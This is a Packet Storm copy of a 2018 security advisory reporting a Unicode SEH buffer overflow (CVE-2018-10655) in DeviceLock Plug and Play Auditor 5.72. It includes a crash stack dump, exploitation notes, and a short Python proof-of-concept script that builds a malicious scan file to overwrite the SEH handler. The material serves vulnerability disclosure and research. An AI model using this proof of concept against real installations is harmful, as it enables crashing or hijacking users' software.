Twenty Year Anniversary

DeviceLock Plug And Play Auditor 5.72 Buffer Overflow

DeviceLock Plug And Play Auditor 5.72 Buffer Overflow
Posted May 7, 2018
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

DeviceLock Plug and Play Auditor version 5.72 suffers from a unicode buffer overflow vulnerability.

tags | exploit, overflow
advisories | CVE-2018-10655
MD5 | e1efa280720a5cbabeff9a9ab68b5ae1

DeviceLock Plug And Play Auditor 5.72 Buffer Overflow

Change Mirror Download
[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEVICELOCK-PLUG-PLAY-AUDITOR-v5.72-UNICODE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security


Vendor:
========
https://www.devicelock.com/freeware.html/


Product:
========
DeviceLock Plug and Play Auditor v5.72 (freeware)
DLPnpAuditor.exe


DeviceLock(r) Plug and Play Auditor is a non-intrusive clientless software solution that generates reports displaying the USB,
FireWire and PCMCIA devices currently connected to computers in the network and those that were connected.



Vulnerability Type:
===================
Unicode Buffer Overflow (SEH)


CVE Reference:
==============
CVE-2018-10655


Security Issue:
================
DeviceLock Plug and Play Auditor "DLPnpAuditor.exe" is vulnerable to a Unicode type of buffer overflow, when supplied a specially crafted textfile using the "scan network" from file option.
The buffer overload payload will get converted to unicode character encoding. Unicode support is used by applications for internationalization purposes allowing a consistent way to visually
represent different character sets on most systems around the world.

e.g.

Before our buffer overflow payload was put on the stack it was expanded with 0x00 so "RRRR" transforms to Unicode representation of "00520052"
(52 is HEX for Ascii char R) containing 0's (NULL) values. Therefore, attempting to exploit the vulnerable program needs an unicode compatiable address
(address with null bytes) and using encoding methods like "alpha2" encoder tool.

Stack dump:

SEH chain of main thread
Address SE handler
0018EE00 ntdll.771B34DD
0018FBD4 00520052
00520052 A42F0000
E5C1411F *** CORRUPT ENTRY ***

EAX 00000000
ECX 00520052
EDX 771B34DD ntdll.771B34DD
EBX 00000000
ESP 0018EDEC
EBP 0018EE0C
ESI 00000000
EDI 00000000
EIP 00520052
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1



Exploit/POC:
=============
1) Create POC textfile
2) Under File menu "Scan Network" choose "From file" under drop down menu.
3) Choose the exploit file select the Scan "Domain" box and run it.

#Unicode SEH Buffer Overflow
#https://www.devicelock.com/download/

PAYLOAD="A"*1036+"R"*8+"B"*56 #Control SEH
file=open("devicelock-bof.txt","w")
file.write(PAYLOAD)
file.close()

print 'DeviceLock Plug and Play Auditor v5.72 (freeware)'
print 'Exploit POC file created.'
print 'hyp3rlinx'



Network Access:
===============
Local



Severity:
=========
High



Disclosure Timeline:
=====================
Vendor Notification: April 17, 2018
No reply
Vendor Notification: April 22, 2018
No reply
May 6, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    4 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close